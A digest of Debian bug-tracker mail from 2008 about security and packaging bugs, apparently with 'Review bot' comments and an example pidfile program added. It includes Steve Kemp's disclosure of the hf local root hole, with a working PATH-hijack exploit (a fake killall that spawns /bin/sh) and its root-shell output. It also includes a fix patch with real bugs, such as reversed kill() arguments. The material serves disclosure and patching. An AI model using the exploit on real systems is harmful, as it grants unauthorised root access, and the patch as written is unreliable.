Bug#503118: marked as done (vlc: CVE-2008-4686 integer overflow in ty parsing)

2008-11-05 Thread Debian Bug Tracking System

Your message dated Wed, 05 Nov 2008 22:32:18 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#503118: fixed in vlc 0.8.6.h-4+lenny1
has caused the Debian Bug report #503118,
regarding vlc: CVE-2008-4686 integer overflow in ty parsing
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
503118: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=503118
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: vlc-nox
Version: 0.8.6.h-4
Severity: grave
File: libty_plugin
Tags: security
Justification: user security hole


VLC versions 0.8.2 through 0.9.4 are prone to an exploitable
stack-based buffer overflow in the TY (TiVo) file parser.

See also http://www.videolan.org/security/sa0809.html

N.B.: please give me the CVE ID if you allocate one.

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (100, 'unstable'), (100, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.27 (SMP w/2 CPU cores)
Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages vlc-nox depends on:
ii  liba52-0.7.4   0.7.4-11  library for decoding ATSC A/52 str
ii  libasound2 1.0.16-2  ALSA library
ii  libavahi-client3   0.6.23-2  Avahi client library
ii  libavahi-common3   0.6.23-2  Avahi common library
ii  libavc1394-0   0.5.3-1+b1control IEEE 1394 audio/video devi
ii  libavcodec51   0.svn20080206-14  ffmpeg codec library
ii  libavformat52  0.svn20080206-14  ffmpeg file format library
ii  libavutil490.svn20080206-14  ffmpeg utility library
ii  libc6  2.7-15GNU C Library: Shared libraries
ii  libcdio7   0.78.2+dfsg1-3library to read and control CD-ROM
ii  libdbus-1-31.2.1-3   simple interprocess messaging syst
ii  libdvbpsi4 0.1.5-3.1 library for MPEG TS and DVB PSI ta
ii  libdvdnav4 4.1.2-3   DVD navigation library
ii  libdvdread30.9.7-11  library for reading DVDs
ii  libebml0   0.7.7-3.1 access library for the EBML format
ii  libfaad0   2.6.1-3.1 freeware Advanced Audio Decoder - 
ii  libflac8   1.2.1-1.2 Free Lossless Audio Codec - runtim
ii  libfreetype6   2.3.7-2   FreeType 2 font engine, shared lib
ii  libfribidi00.10.9-1  Free Implementation of the Unicode
ii  libgcc11:4.3.2-1 GCC support library
ii  libgcrypt111.4.1-1   LGPL Crypto library - runtime libr
ii  libgnutls262.4.2-1   the GNU TLS library - runtime libr
ii  libhal10.5.11-5  Hardware Abstraction Layer - share
ii  libid3tag0 0.15.1b-10ID3 tag reading library from the M
ii  libiso9660-5   0.78.2+dfsg1-3library to work with ISO9660 files
ii  liblircclient0 0.8.3-3   infra-red remote control support -
ii  libmad00.15.1b-3 MPEG audio decoder library
ii  libmatroska0   0.8.1-1.1 extensible open standard audio/vid
ii  libmodplug0c2  1:0.8.4-2 shared libraries for mod music bas
ii  libmpcdec3 1.2.2-1   Musepack (MPC) format library
ii  libmpeg2-4 0.4.1-3   MPEG1 and MPEG2 video decoder libr
ii  libncurses55.6+20081011-1shared libraries for terminal hand
ii  libogg01.1.3-4   Ogg Bitstream Library
ii  libpng12-0 1.2.27-2  PNG library - runtime
ii  libpostproc51  0.svn20080206-14  ffmpeg video postprocessing librar
ii  libraw1394-8   1.3.0-4   library for direct access to IEEE 
ii  libsmbclient   2:3.2.3-3 shared library that allows applica
ii  libspeex1  1.2~rc1-1 The Speex codec runtime library
ii  libstdc++6 4.3.2-1   The GNU Standard C++ Library v3
ii  libsysfs2  2.1.0-5   interface library to sysfs
ii  libtheora0 1.0~beta3-1   The Theora Video Compression Codec
ii  libtwolame00.3.12-1  MPEG Audio Layer 2 encoding librar
ii  libvcdinfo00.7.23-4  library to extract information fro
ii  libvlc00.8.6.h-4 multimedia player and streamer lib
ii  libvorbis0a1.2.0.dfsg-3.1The Vorbis General Audio Compressi
ii  libvorbisenc2  1.2.0.dfsg-3.1The Vorbis General A

Bug#382175: Sun RPC libraries and other stories

2008-11-05 Thread Michael Banck
On Wed, Nov 05, 2008 at 03:32:35PM -0600, Ean Schuessler wrote:
> I'm here at ApacheCon with Simon Phipps and he said that Sun would be
> "delighted to help Debian resolve the RPC licensing problems". He
> wanted to note that the Free Software Definition did not exist at the
> time when Sun released to the community and they couldn't have
> predicted that it would violate the DFSG. Considering when it was
> released, it's very open. He also noted that Sun hasn't pursued any
> legal action in all this time and that is a good indicator of their
> position on the whole thing.
> 
> All we need to do is get Simon a diff of what changes we need made and
> he will help us make the arrangements. In short, Sun is all for Debian
> keeping the RPC code in libc6 or the kernel and will do what is
> necessary to make it happen.

Assuming Sun is the sole copyright holder of that code, he could advise
their IP lawyers/whoever to relicense the code; either to the glibc
license (LGPL-1.2 or later, currently), or perhaps the BSD license.  The
latter would probably be best for portmap as well, considering it is BSD
licensed.

If Sun does not want to relicense to BSD/LGPL this code due to their
corporate licensing strategy, but still want to see the code remain in
Debian's glibc/portmap, they should propose a compatible license they
like I'd say.

Thanks for working on this, let's hope we can resolve this in time for
Lenny!


regards,

Michael






Bug#502824: alevt: diff for NMU version 1:1.6.1-10.2

2008-11-05 Thread Chris Lamb
Mark Purcell wrote:

> > I have prepared and uploaded it *3* times, both to the SSH queue on
> > ravel and via FTP; every time the upload simply disappears.
> 
> That's a bit weird ;-(

Fourth time lucky - this time the upload was ACCEPTED.

-release, please unblock alevt/1:1.6.1-10.2. The associated changelog entry
is:

 alevt (1:1.6.1-10.2) unstable; urgency=medium

   * Non-maintainer upload.
   * Use correct patch to prevent installation failing in postinst - MAKEDEV
 will take care of creating devices in /dev/.static when it detects that
 udev is active. Thanks to Adeodato Simó for the updated patch. (Closes:
 #502824)


Regards,

-- 
  ,''`.
 : :'  : Chris Lamb
 `. `'`  [EMAIL PROTECTED]
   `-




Processed: tagging 504639

2008-11-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> tags 504639 + pending
Bug#504639: vlc: buffer overflow in CUE support
Tags were: security
Tags added: pending

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)





Bug#502824: marked as done (alevt: piuparts test fails: /var/lib/dpkg/info/alevt.postinst: line 16: ./MAKEDEV: No such file or directory)

2008-11-05 Thread Debian Bug Tracking System

Your message dated Wed, 05 Nov 2008 21:47:03 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#502824: fixed in alevt 1:1.6.1-10.2
has caused the Debian Bug report #502824,
regarding alevt: piuparts test fails: /var/lib/dpkg/info/alevt.postinst: line 
16: ./MAKEDEV: No such file or directory
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
502824: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=502824
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: alevt
Version: 1:1.6.1-10
Severity: serious
User: [EMAIL PROTECTED]
Usertags: piuparts-20081020 piuparts

Hi,

During tests using piuparts of all packages in lenny,
I ran into the following problem:

>   Reading package lists...
>   Building dependency tree...
>   Reading state information...
>   The following packages were automatically installed and are no longer 
> required:
> libgc1c2
>   Use 'apt-get autoremove' to remove them.
>   The following extra packages will be installed:
> libpng12-0 libvolume-id0 libx11-6 libx11-data libxau6 libxcb-xlib0 libxcb1
> libxdmcp6 udev
>   The following NEW packages will be installed:
> alevt libpng12-0 libvolume-id0 libx11-6 libx11-data libxau6 libxcb-xlib0
> libxcb1 libxdmcp6 udev
>   0 upgraded, 10 newly installed, 0 to remove and 0 not upgraded.
>   Need to get 1456kB of archives.
>   After this operation, 6349kB of additional disk space will be used.
>   WARNING: The following packages cannot be authenticated!
> libvolume-id0 udev libpng12-0 libxau6 libxdmcp6 libxcb1 libxcb-xlib0
> libx11-data libx11-6 alevt
>   Authentication warning overridden.
>   Get:1 http://127.0.0.1 lenny/main libvolume-id0 0.125-7 [76.1kB]
>   Get:2 http://127.0.0.1 lenny/main udev 0.125-7 [253kB]
>   Get:3 http://127.0.0.1 lenny/main libpng12-0 1.2.27-2 [166kB]
>   Get:4 http://127.0.0.1 lenny/main libxau6 1:1.0.3-3 [11.9kB]
>   Get:5 http://127.0.0.1 lenny/main libxdmcp6 1:1.0.2-3 [17.0kB]
>   Get:6 http://127.0.0.1 lenny/main libxcb1 1.1-1.1 [43.1kB]
>   Get:7 http://127.0.0.1 lenny/main libxcb-xlib0 1.1-1.1 [15.1kB]
>   Get:8 http://127.0.0.1 lenny/main libx11-data 2:1.1.5-2 [169kB]
>   Get:9 http://127.0.0.1 lenny/main libx11-6 2:1.1.5-2 [623kB]
>   Get:10 http://127.0.0.1 lenny/main alevt 1:1.6.1-10 [81.7kB]
>   debconf: delaying package configuration, since apt-utils is not installed
>   Fetched 1456kB in 0s (5256kB/s)
>   Can not write log, openpty() failed (/dev/pts not mounted?)
>   Selecting previously deselected package libvolume-id0.
>   (Reading database ... 5777 files and directories currently installed.)
>   Unpacking libvolume-id0 (from .../libvolume-id0_0.125-7_i386.deb) ...
>   Selecting previously deselected package udev.
>   Unpacking udev (from .../archives/udev_0.125-7_i386.deb) ...
>   Selecting previously deselected package libpng12-0.
>   Unpacking libpng12-0 (from .../libpng12-0_1.2.27-2_i386.deb) ...
>   Selecting previously deselected package libxau6.
>   Unpacking libxau6 (from .../libxau6_1%3a1.0.3-3_i386.deb) ...
>   Selecting previously deselected package libxdmcp6.
>   Unpacking libxdmcp6 (from .../libxdmcp6_1%3a1.0.2-3_i386.deb) ...
>   Selecting previously deselected package libxcb1.
>   Unpacking libxcb1 (from .../libxcb1_1.1-1.1_i386.deb) ...
>   Selecting previously deselected package libxcb-xlib0.
>   Unpacking libxcb-xlib0 (from .../libxcb-xlib0_1.1-1.1_i386.deb) ...
>   Selecting previously deselected package libx11-data.
>   Unpacking libx11-data (from .../libx11-data_2%3a1.1.5-2_all.deb) ...
>   Selecting previously deselected package libx11-6.
>   Unpacking libx11-6 (from .../libx11-6_2%3a1.1.5-2_i386.deb) ...
>   Selecting previously deselected package alevt.
>   Unpacking alevt (from .../alevt_1%3a1.6.1-10_i386.deb) ...
>   Can not write log, openpty() failed (/dev/pts not mounted?)
>   Setting up libvolume-id0 (0.125-7) ...
>   Setting up udev (0.125-7) ...
>   unable to open device '/class/net/*'
>   A chroot environment has been detected, udev not started.
>   Setting up libpng12-0 (1.2.27-2) ...
>   Setting up libxau6 (1:1.0.3-3) ...
>   Setting up libxdmcp6 (1:1.0.2-3) ...
>   Setting up libxcb1 (1.1-1.1) ...
>   Setting up libxcb-xlib0 (1.1-1.1) ...
>   Setting up libx11-data (2:1.1.5-2) ...
>   Setting up libx11-6 (2:1.1.5-2) ...
>   Setting up alevt (1:1.6.1-10) ...
>   creating video4linux devices in /dev...
>   /var/lib/dpkg/info/alevt.postinst: line 16: ./MAKEDEV: No such file or 
> directory
>   dpkg: error processing alevt (--configure):
>subprocess post-installation script returned error exit status 1
>   Errors wer

Bug#382175: Sun RPC libraries and other stories

2008-11-05 Thread Ean Schuessler
I'm here at ApacheCon with Simon Phipps and he said that Sun would be 
"delighted to help Debian resolve the RPC licensing problems". He wanted to 
note that the Free Software Definition did not exist at the time when Sun 
released to the community and they couldn't have predicted that it would 
violate the DFSG. Considering when it was released, it's very open. He also 
noted that Sun hasn't pursued any legal action in all this time and that is a 
good indicator of their position on the whole thing.

All we need to do is get Simon a diff of what changes we need made and he will 
help us make the arrangements. In short, Sun is all for Debian keeping the RPC 
code in libc6 or the kernel and will do what is necessary to make it happen.

-- 
Ean Schuessler, CTO Brainfood.com
[EMAIL PROTECTED] - http://www.brainfood.com - 214-720-0700 x 315






Processed: tagging 503589

2008-11-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> tags 503589 patch
Bug#503589: wireshark: CVE-2008-46[80-85] multiple security issues
Tags were: security
Tags added: patch

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)





Bug#503589: Wireshark CVE patches

2008-11-05 Thread Mark Purcell
On Monday 03 November 2008 04:44:42 Stefan Lesicnik wrote:
> I have uploaded 3 debdiffs for the CVE's for Ubuntu - these are
> currently awaiting review

Stefan,

Thanks for your work on this.

Frederic, Joost,

Are you in a position to upload a fixed package to fix this RC bug in lenny?

Mark






Processed: add patch tag

2008-11-05 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> tag 503543 patch
Bug#503543: ptex-bin: fail to remove and break etch-to-lenny upgrade.
There were no tags set.
Tags added: patch

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)





Bug#504182: marked as done (hf: CVE-2008-2378 insecure system call leading to local root)

2008-11-05 Thread Debian Bug Tracking System

Your message dated Wed, 05 Nov 2008 21:02:48 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#504182: fixed in hf 0.8-8.1
has caused the Debian Bug report #504182,
regarding hf: CVE-2008-2378 insecure system call leading to local root
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
504182: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504182
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Source: hf
Severity: grave
Tags: security

- Forwarded message from Steve Kemp <[EMAIL PROTECTED]> -

From: Steve Kemp <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
User-Agent: Mutt/1.5.17+20080114 (2008-01-14)
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: [Secure-testing-team] hf - CVE-2008-2378 - local root exploit


 The hf package, Described by Debian as an amateur-radio protocol suite
 using a soundcard as a modem, is a program that eventually becomes
 setuid(0), and has a trivial security hole in it.

 By default the package installs "/usr/bin/hfkernel" as a typical binary,
 but when first started via the program "hf" the binary is changed to
 be setuid(root).

 This is demonstrated:

[EMAIL PROTECTED]:~$ hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. Be aware that this can be a security hole.
Please do as root "chmod 4755 /usr/bin/hfkernel".
or start this script again as root.


 If you do start the program as root the permissions are changed:

[EMAIL PROTECTED]:~$ sudo hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. But be aware that this can be a security hole.
I will do this now "chmod 4755 /usr/bin/hfkernel".
For you, root, I will start only hfkernel for test purposes.
...

  Now the program is setuid:

[EMAIL PROTECTED]:~$ ls -l /usr/bin/hfkernel
-rwsr-xr-x 1 root root 244120 2008-05-07 19:37 /usr/bin/hfkernel


  Unfortunately the hfkernel program contains a trivial root hole:

int main(int argc, char *argv[])
{
    // snip
    while ((c = getopt(argc, argv, "a:M:c:klhip:m:nt:s:r:Rf23")) != -1)
        switch (c) {

        // snip

        case 'k':
            system ("killall hfkernel");

        //
        }
}

  Creating ~/bin/killall is sufficient to gain root privileges.

[EMAIL PROTECTED]:~$ echo -e '#!/bin/sh\n/bin/sh' > ~/bin/killall
[EMAIL PROTECTED]:~$ chmod 755 ~/bin/killall
[EMAIL PROTECTED]:~$ hfkernel -k
sh-3.2# id
uid=1000(skx) gid=1000(skx) euid=0(root)


  This has been given the identifier CVE-2008-2378.

  Below is the patch that I've come up with to fix this hole, which
 is a simple pidfile approach.  Unless anybody has any comments
 I'll upload a fix for Etch on Monday/Tuesday.

Steve
--


--- hf-0.8/hfkernel/main.c  2006-12-22 10:44:23.0 +
+++ hf-0.8.orig/hfkernel/main.c 2008-11-01 10:33:44.0 +
@@ -7,19 +7,7 @@
  *  Copyright (C) 1996  Thomas Sailer ([EMAIL PROTECTED])
  *  Swiss Federal Institute of Technology (ETH), Electronics Lab
  * modified by Gnther Montag
- *  This program is free software; you can redistribute it and/or modify
- *  it under the terms of the GNU General Public License as published by
- *  the Free Software Foundation; either version 2 of the License, or
- *  (at your option) any later version.
- *
- *  This program is distributed in the hope that it will be useful,
- *  but WITHOUT ANY WARRANTY; without even the implied warranty of
- *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
- *  GNU General Public License for more details.
- *
- *  You should have received a copy of the GNU General Public License
- *  along with this program; if not, write to the Free Software
- *  Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
+ *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this p
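
Review bot: the file headers read "--- hf-0.8/hfkernel/main.c" and "+++ hf-0.8.orig/hfkernel/main.c", so this diff runs from the patched tree to the original and would apply in reverse, and the first hunk touches nothing but the licence comment. Regenerate it with the .orig tree on the "---" side and leave the licence header alone, so that the security change is the only thing under review.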

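The pidfile approach Steve Kemp describes above, written out as an added example (not code from the hf package or from either patch in this thread): the stop path reads a pid from a file and calls kill() directly, so no shell and no PATH lookup is involved. The function names, the temporary path and the forked demo child are assumptions made for illustration, and the caller is assumed to be allowed to stop the daemon.

```c
/* Added example: stop a daemon through a pidfile instead of
   system("killall ..."). Not from the hf sources; names are illustrative. */
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Accept only "<digits>" with an optional trailing newline and a value > 1.
   0 and negative values would make kill() target a process group or every
   process, and 1 is init, so all of them are rejected. */
pid_t parse_pid(const char *s)
{
    char *end;
    long v;

    if (s == NULL || *s < '0' || *s > '9')
        return -1;
    errno = 0;
    v = strtol(s, &end, 10);
    if (errno != 0 || v <= 1 || v > INT_MAX)
        return -1;
    if (*end == '\n')
        end++;
    return *end == '\0' ? (pid_t)v : -1;
}

/* O_EXCL refuses to reuse an existing file or to follow a planted symlink. */
int write_pidfile(const char *path, pid_t pid)
{
    char buf[32];
    int len, fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0644);

    if (fd < 0)
        return -1;
    len = snprintf(buf, sizeof buf, "%ld\n", (long)pid);
    if (write(fd, buf, (size_t)len) != (ssize_t)len) {
        close(fd);
        unlink(path);
        return -1;
    }
    return close(fd);
}

/* Read the file without following a symlink and validate its content. */
pid_t read_pidfile(const char *path)
{
    char buf[32];
    ssize_t n;
    int fd = open(path, O_RDONLY | O_NOFOLLOW);

    if (fd < 0)
        return -1;
    n = read(fd, buf, sizeof buf - 1);
    close(fd);
    if (n <= 0)
        return -1;
    buf[n] = '\0';
    return parse_pid(buf);
}

/* kill() takes the pid first and the signal second. ESRCH means the process
   is already gone, so the stale file is still removed. */
int stop_daemon(const char *path)
{
    pid_t pid = read_pidfile(path);

    if (pid < 0)
        return -1;
    if (kill(pid, SIGTERM) != 0 && errno != ESRCH)
        return -1;
    return unlink(path);
}

/* Constructed demo: fork a child that only sleeps, record it in a pidfile
   inside a fresh private directory, stop it through the pidfile, and return
   the signal that ended it (-1 on any failure). */
int demo_stop_child(void)
{
    char dir[] = "/tmp/pidfile-demo-XXXXXX";
    char path[64];
    int status, ok;
    pid_t child;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(path, sizeof path, "%s/demo.pid", dir);
    child = fork();
    if (child < 0)
        return -1;
    if (child == 0)
        for (;;)
            pause();
    ok = write_pidfile(path, child) == 0 && stop_daemon(path) == 0;
    if (!ok) {
        kill(child, SIGKILL);
        unlink(path);
    }
    waitpid(child, &status, 0);
    rmdir(dir);
    return ok && WIFSIGNALED(status) ? WTERMSIG(status) : -1;
}

int main(void)
{
    printf("child ended by signal %d\n", demo_stop_child());
    return 0;
}
```
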
Bug#504639: vlc: buffer overflow in CUE support

2008-11-05 Thread Remi Denis-Courmont
Package: vlc-nox
Version: 0.8.6.h-4.1
Severity: grave
Tags: security
Justification: user security hole


Hello,

When parsing the header of an invalid CUE image file or an invalid
RealText subtitle file, stack-based buffer overflows might occur:
http://www.videolan.org/security/sa0810.html

(I believe the RealText problem only affects experimental)

Regards.

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (100, 'unstable'), (100, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.27.4 (SMP w/2 CPU cores)
Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages vlc-nox depends on:
ii  liba52-0.7.4   0.7.4-11  library for decoding ATSC A/52 str
ii  libasound2 1.0.16-2  ALSA library
ii  libavahi-client3   0.6.23-2  Avahi client library
ii  libavahi-common3   0.6.23-2  Avahi common library
ii  libavc1394-0   0.5.3-1+b1control IEEE 1394 audio/video devi
ii  libavcodec51   0.svn20080206-14  ffmpeg codec library
ii  libavformat52  0.svn20080206-14  ffmpeg file format library
ii  libavutil490.svn20080206-14  ffmpeg utility library
ii  libc6  2.7-15GNU C Library: Shared libraries
ii  libcdio7   0.78.2+dfsg1-3library to read and control CD-ROM
ii  libdbus-1-31.2.1-4   simple interprocess messaging syst
ii  libdvbpsi4 0.1.5-3.1 library for MPEG TS and DVB PSI ta
ii  libdvdnav4 4.1.2-3   DVD navigation library
ii  libdvdread30.9.7-11  library for reading DVDs
ii  libebml0   0.7.7-3.1 access library for the EBML format
ii  libfaad0   2.6.1-3.1 freeware Advanced Audio Decoder - 
ii  libflac8   1.2.1-1.2 Free Lossless Audio Codec - runtim
ii  libfreetype6   2.3.7-2   FreeType 2 font engine, shared lib
ii  libfribidi00.10.9-1  Free Implementation of the Unicode
ii  libgcc11:4.3.2-1 GCC support library
ii  libgcrypt111.4.1-1   LGPL Crypto library - runtime libr
ii  libgnutls262.4.2-1   the GNU TLS library - runtime libr
ii  libhal10.5.11-6  Hardware Abstraction Layer - share
ii  libid3tag0 0.15.1b-10ID3 tag reading library from the M
ii  libiso9660-5   0.78.2+dfsg1-3library to work with ISO9660 files
ii  liblircclient0 0.8.3-3   infra-red remote control support -
ii  libmad00.15.1b-3 MPEG audio decoder library
ii  libmatroska0   0.8.1-1.1 extensible open standard audio/vid
ii  libmodplug0c2  1:0.8.4-2 shared libraries for mod music bas
ii  libmpcdec3 1.2.2-1   Musepack (MPC) format library
ii  libmpeg2-4 0.4.1-3   MPEG1 and MPEG2 video decoder libr
ii  libncurses55.6+20081025-1shared libraries for terminal hand
ii  libogg01.1.3-4   Ogg Bitstream Library
ii  libpng12-0 1.2.27-2  PNG library - runtime
ii  libpostproc51  0.svn20080206-14  ffmpeg video postprocessing librar
ii  libraw1394-8   1.3.0-4   library for direct access to IEEE 
ii  libsmbclient   2:3.2.4-1 shared library that allows applica
ii  libspeex1  1.2~rc1-1 The Speex codec runtime library
ii  libstdc++6 4.3.2-1   The GNU Standard C++ Library v3
ii  libsysfs2  2.1.0-5   interface library to sysfs
ii  libtheora0 1.0~beta3-1   The Theora Video Compression Codec
ii  libtwolame00.3.12-1  MPEG Audio Layer 2 encoding librar
ii  libvcdinfo00.7.23-4  library to extract information fro
ii  libvlc00.8.6.h-4.1   multimedia player and streamer lib
ii  libvorbis0a1.2.0.dfsg-3.1The Vorbis General Audio Compressi
ii  libvorbisenc2  1.2.0.dfsg-3.1The Vorbis General Audio Compressi
ii  libxml22.6.32.dfsg-4 GNOME XML library
ii  zlib1g 1:1.2.3.3.dfsg-12 compression library - runtime

vlc-nox recommends no packages.

vlc-nox suggests no packages.

-- no debconf information






Bug#502706: predepends - adduser

2008-11-05 Thread Stefan Lesicnik
Hi Chris,

I am busy merging the xtell package and we have the same fix re.
update-inetd being called in the preinst script. The other fix we have that
is not included is that adduser should also be preinst, as it is also called
in preinst.
Otherwise our packages are the same. If you agree with this assessment, would
it be possible for you to upload a new package, and then I will request a
sync into Ubuntu.

Thanks!

--
Stefan Lesicnik

Linux System Dynamics


Bug#504182: intent to NMU

2008-11-05 Thread Nico Golde
Hi,
I intend to upload an NMU to fix this bug.
debdiff attached and archived on:
http://people.debian.org/~nion/nmu-diff/hf-0.8-8_0.8-8.1.patch

Cheers
Nico

-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
diff -u hf-0.8/debian/changelog hf-0.8/debian/changelog
--- hf-0.8/debian/changelog
+++ hf-0.8/debian/changelog
@@ -1,3 +1,12 @@
+hf (0.8-8.1) unstable; urgency=high
+
+  * Non-maintainer upload by the Security Team.
+  * Fix local root security hole that is caused by an insecure call
+to the system function, thanks Steve Kemp for the patch
+(CVE-2008-2378; Closes: #504182).
+
+ -- Nico Golde <[EMAIL PROTECTED]>  Wed, 05 Nov 2008 21:19:58 +0100
+
 hf (0.8-8) unstable; urgency=low
 
   * Remove asm/page.h include from util/reffreq.c. Closes: #479967.
only in patch2:
unchanged:
--- hf-0.8.orig/hfkernel/main.c
+++ hf-0.8/hfkernel/main.c
@@ -78,6 +78,11 @@
 #include "alsa.h"
 #endif /* HAVE_ALSA_ASOUNDLIB_H */
 
+#ifndef PID_FILE
+# define PID_FILE "/var/run/hfkernel.pid"
+#endif
+
+
 /* - */
 
 /* these variables take hfkernel's options */
@@ -154,6 +159,49 @@
 	}
 }
 
+void kill_daemon()
+{
+	FILE *f;
+	int pid;
+
+	if (!(f = fopen (PID_FILE, "r")))
+{
+ errstr( SEV_FATAL, "Failed to read from PID file");
+  exit(1);
+}
+	fscanf (f, "%d", &pid);
+	fclose (f);
+
+kill( SIGKILL, pid );
+unlink( PID_FILE );
+exit(1);
+}
+
+
+int write_pid()
+{
+	char buf[20];
+	int fd;
+	long pid;
+
+	if ((fd = open (PID_FILE, O_CREAT | O_TRUNC | O_WRONLY, 0600)) == -1)
+	{
+errstr (SEV_FATAL, "cannot open pidfile for writing ");
+exit(1);
+	}
+else
+{
+		pid = getpid ();
+		snprintf (buf, sizeof (buf), "%ld", (long) pid);
+		if (write (fd, buf, strlen (buf)) != strlen (buf))
+{
+   errstr (SEV_FATAL, "cannot write to pidfile ");
+   exit(1);
+}
+		close(fd);
+	}
+	return pid;
+}
 
 /* - */
 
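Review bot: in kill_daemon() the call "kill( SIGKILL, pid )" has its arguments reversed; kill() takes the process id first and the signal second, so as written it sends signal number pid to the process whose id equals SIGKILL. The fscanf() result is also unchecked, which leaves pid uninitialised on an empty or malformed file, and a value of 0 or a negative number would make kill() signal a process group or every process. Call "kill(pid, SIGKILL)" only after confirming that fscanf() returned 1 and that pid > 1. In write_pid(), add O_EXCL to the open() flags and return a pid_t instead of narrowing the long to int.
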
@@ -529,8 +577,8 @@
 break;
 
 case 'k':
-system ("killall hfkernel");
-
+ kill_daemon();
+ break;
 case 'l':
 logging = 1;
 break;
@@ -635,6 +683,7 @@
 
 exit(1);
 }
+
 if (logging)
 openlog("hfkernel", LOG_PID, LOG_DAEMON);
 	printf("hfkernel %s starting...\n", PACKAGE_VERSION);
@@ -699,6 +748,8 @@
 
 	printf("Note: hfkernel is only part of the hf package.\n"); 
 	printf("It is controlled by the graphic terminal hfterm. To start them both, use the start script hf. In newer linuxes (kernel 2.6...) we need the syntax\n ÂŽLD_ASDSUME_KERNEL=2.2.5 hftermÂŽ, this is already prepared in the hf script. \n");
+write_pid();
+
 	start_io_thread();
 	exit(0); }
 
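Review bot: write_pid() is called here with its return value ignored, and nothing in this patch removes the pidfile when hfkernel exits on its own; only kill_daemon() unlinks it. A stale /var/run/hfkernel.pid then makes a later "hfkernel -k" signal whatever unrelated process has since been given that pid. Register an atexit() or signal handler that unlinks PID_FILE, or have kill_daemon() confirm that the target is hfkernel before signalling.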




Bug#503543: nmu proposal

2008-11-05 Thread Sven Hoexter
Hi,
attached is a first NMU proposal and a debdiff of the source.

Sven
-- 
If God passed a mic to me to speak
I'd say stay in bed, world
Sleep in peace
   [The Cardigans - 03:45: No sleep]
diff -u ptex-bin-3.1.10+0.04b/debian/ptex-bin.preinst ptex-bin-3.1.10+0.04b/debian/ptex-bin.preinst
--- ptex-bin-3.1.10+0.04b/debian/ptex-bin.preinst
+++ ptex-bin-3.1.10+0.04b/debian/ptex-bin.preinst
@@ -46,7 +46,9 @@
 dpkg-divert --package ptex-bin --add --rename --divert \
   /usr/share/man/man1/tftopl.nonja.1.gz /usr/share/man/man1/tftopl.1.gz
 	  
-mktexlsr
+if [ -x "`which mktexlsr 2>/dev/null`" ]; then
+	mktexlsr
+fi
 
 ;;
 
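Review bot: the added test runs the external "which" inside backticks; "command -v mktexlsr >/dev/null 2>&1" does the same check with a shell builtin and without the nested quoting. Guarding the call is the right idea at this point, because a preinst can run before anything in Depends has been unpacked.
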
diff -u ptex-bin-3.1.10+0.04b/debian/control ptex-bin-3.1.10+0.04b/debian/control
--- ptex-bin-3.1.10+0.04b/debian/control
